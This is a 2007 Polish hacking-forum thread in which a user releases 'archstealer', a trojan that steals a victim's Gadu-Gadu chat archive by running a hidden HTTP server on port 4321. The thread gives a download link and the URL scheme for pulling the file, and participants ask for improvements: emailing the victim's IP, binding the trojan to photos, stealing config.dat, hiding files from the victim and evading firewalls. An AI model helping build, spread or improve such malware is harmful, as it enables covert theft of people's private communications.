archstealer czyli złodziej archiwów

[grzonu]

znow wydałem nowy sofcik tym razem to złodziej archiwów
http://rapidshare.com/files/51657517/archstealer.rar
program to serwer http i archiwum umieszcza w swoim katalogu po czym mozna sciagnac go za posrednictwem przegladarki na porcie 4321.
po odpaleniu przez ofiare tworzy serwer i aby sciagnac serwer nalezy po prostu wejsc na adres http://adres_ip_ofiary:4321/archives.dat czasem wystepuja problemy w sciagnieciu lecz wystarczy wziasc wstecz i potem dalej i sie sciagnie

zapraszam do testow i oceny

 

[x3600]

to nie jest zaden program!!!

 

[grzonu]

a co twoim zdaniem?

 

[x3600]

server ale go usunołem ;p

 

[grzonu]

no i tylko to ma byc bo to wysyłasz ofierze

 

[qwerty6]

skad bede wiedzial ze ofiara go otworzyla...? ;]
i czy ten link wtedy bedzie dzialal bo na razie mi nie dziala..? :nauka:

 

[grzonu]

jaki link? do sciagniecia?

[ Dodano: 27-08-2007, 19:49 ]
on ci poprostu tworzy serwer http i udostepnia plik ty go musisz tylko pobrac

 

[x3600]

Aha. A jakie pliki sie udostępnią ?? Czy bede mógł sam wybierać ?? ;]

 

[qwerty6]

ale napisz skad bede wiedzial ze go ofiara otworzyla... ;]

ten drugi z IP tylko on mi nie dziala .. ;/

bedzie dzialal jak ofiara otworzy ten serwer...? :nauka:

 

[grzonu]

to nie jest adres tylko schemat adresu czyli http:// potem podajesz ip ofiary a po dwukropku port czyli 4321 i/archives.dat
i ci sie sciaga
a ja cos nie tak
to bierzesz wstecz i dalej w przegladarce i sciagasz

[ Dodano: 27-08-2007, 20:06 ]
a poznasz ze otworzyl jak ci sie uda sciagnac bo inaczej nie wejdziesz na serwer

 

[Gebels]

Uruchomiłem u siebie serwer, wpisałem moje ip w przeglądarce i wszystko ok - działa. Udało mi się ściągnąć moje archiwum.

Następnie zrobiłem test na drugim kompie, uruchomiłem, wpisałem jego IP, połączył z serwerem i ściągnął archiwum. Tylko tyle, że ściągnął 24 bajty a miał 2,5 mb. Coś nie działa.


Z minusów trzeba napisać, brak podawania IP ofiary (np. na maila), co może być kłopotliwe w szczególności jak ktoś ma neostradę, chociaż nie tylko... Dziwi mnie też, że jak się uruchomi serwer to archiwum zapisywane jest do tego samego folderu co serwer. To bezsensu, ofiara może się kapnąć, że zostało jej coś podrzucone w celu ukradnięcia archiwum. Dobrze przynajmniej, że nawet po skasowaniu tego archiwum i tak jest możliwość jego ściągnięcia. Wniosek - program wysyła go z folderu GG a nie ze swojego katalogu, co jeszcze bardziej zastanawia mnie po co on tam się kopiuje.

Ogólnie bardzo fajny program. Nie widziałem jeszcze takiego tylko do wyciągania archiwum GG, co jest bardzo przydatne :faja: Fajnie by było jakbyś go jeszcze dopracował (automatyczne podawanie IP...), no i jeszcze to duże zużycie procka w granicach 60% do 85%. I ściągnięte archiwum zajmuje tylko 24 bajty, coś nie chce ściągać.

Aaa, Sygete firewall nie widzi żadnego połączenia ;] Outpost niestety wykrywa, że program gdzieś łączy.

Mam nadzieję, że wydasz ulepszoną wersję, bo program jest bardzo obiecujący :faja:

 

[grzonu]

nie on wysyła z katalogu swojego a ponowne wyslanie jest mozliwe tyle ze zrob w przegladarce wstecz i potem dalej bo to mi tez tak robil wkoncu zalapie bie wiem czemu tak sie dzieje

 

[Gebels]

Originally posted by grzonu
nie on wysyła z katalogu swojego a ponowne wyslanie jest mozliwe tyle ze zrob w przegladarce wstecz i potem dalej bo to mi tez tak robil wkoncu zalapie bie wiem czemu tak sie dzieje

Chyba nie za bardzo się zrozumieliśmy. Ja nie mam problemu z połaczeniem z serwerem. Odrazu łączy, tylko że ściagnięte archiwum zajmuje właściwie nic - 24 bajty.

Odnośnie zapisywania pliku archiwum w folderze serweru, to nadal nie rozumiem po co ono tam się kopiuje, i chyba nie za bardzo mi to wyjaśniłeś

 

[grzonu]

kopiuje sie z katalogu serwera tyle ze potem ci wskakuje tez do windowsa a wiem ze 24 bajty u mnie tak samo wez wstecz w przegladarce a potem dalej
i bedzie sie sciagal a jak nie to musisz poczekac na restart kompa ofiary

[ Dodano: 27-08-2007, 21:02 ]
a do wysylania ip to napisalem inny program tylko jeszcze nie ma konfiguratora wiec nie umiescilem ale w tym tygodniu wyjdzie

 

[Gebels]

Dasz radę dodać funkcję wysyłania IP na maila albo cokolwiek w tym stylu - byle było automatycznie. Może mógłbyś skopiować tą funkcję z Twojego keyloggera? Chodzi mi żeby to archstealer robił a nie jakiś inny program, to trochę komplikuje. Chociaż można to zbindować...

 

[grzonu]

da rade po prostu musicie poczekac z kilka dni a juz dziala ci tak jak c napisalem z tym wstecz?

 

[Gebels]

Ale nadal nie rozumiem dlaczego podczas odpalenia serwera (np. zdjecia.exe - serwer zbindowany ze zdjęciami) W TYM SAMYM FOLDERZE co serwer pojawia/kopiuje się plik archives.dat. Krótko mówiąć, ofiara zobaczy, że pojawiło się archiwum GG którego wcześniej nie było. Wydaje mi się, że to jest błąd. Mam nadzieję, że tym razem się zrozumiemy :faja:

Originally posted by grzonu
a juz dziala ci tak jak c napisalem z tym wstecz?

Nie działa cały czas, ściąga tylko 24 bajty. Teraz tak samo na moim i na drugim kompie. W pliku archives.dat znajduje się tekst "404 Nie ma takiego pliku". Nie mogę w ogóle wziąć ani wstecz ani dalej. Nie ma takiej opcji, w sensie nie ma dokąd cofnąć przeglądarką (firefox). Internet explorer w góle nigdzie nie łączy. Po restarcie kompa wszystko działa. Być może jest to związane z tym niepotrzebnym kopiowaniem archiwum do folderu? Program nie wie z jakiej lokalizacji ściągnąć = "404 Nie ma takiego pliku".

Tak pomyślałem... dałbyś radę dodać ściąganie pliku config.dat?

 

[grzonu]

to nie jest zwiazane z kopiouwaniem wiem u mnie tez czasem twierdzi ze nie ma takiego pliku ale naprawde kilka razy jak wezme cofnij potem dalej to znajduje. wstecz to mozesz sobie najpierw wejsc na google a dopiero potem tam

poprostu aby cos mozna bylo sciagac musi byc w tym samym folderze

[ Dodano: 28-08-2007, 07:05 ]
ofiara jak jest niekumata to pomysli ze poprostu cos nie działa a po restarcie plik jak jest w c:wndows to juz ona uwagi nie zwraca na to(dzieki temu mozesz tez pobierac pliki z c:windows(choc nie wiem po co)

 

[Gebels]

Originally posted by grzonu
to nie jest zwiazane z kopiouwaniem wiem u mnie tez czasem twierdzi ze nie ma takiego pliku ale naprawde kilka razy jak wezme cofnij potem dalej to znajduje. wstecz to mozesz sobie najpierw wejsc na google a dopiero potem tam

poprostu aby cos mozna bylo sciagac musi byc w tym samym folderze

[ Dodano: 28-08-2007, 07:05 ]
ofiara jak jest niekumata to pomysli ze poprostu cos nie działa a po restarcie plik jak jest w c:wndows to juz ona uwagi nie zwraca na to(dzieki temu mozesz tez pobierac pliki z c:windows(choc nie wiem po co)

Ok teraz rozumiem dlaczego w tym samym folderze znajduje się archives.dat.

Czyli podsumowując

:
-brak automatycznego wykrywania IP
-problem ze ściąganiem pliku
-wysyłanie pliku config.dat
-ukrycie w jakiś sposób pliku archives.dat :faja:

Pozdro.

 

[grzonu]

naprawie to tylko poczekaj ja to napisalem w ciagu jednego dnia specjalnie dla jednej osoby to przy okazji umiescilem ale napewno dopracuje jak znajde troche czasu

[ Dodano: 28-08-2007, 12:20 ]
moze nawet w tym tygodni ale nie wiem bo zaraz do szkoly ale napewno wyjdzie nowa wersja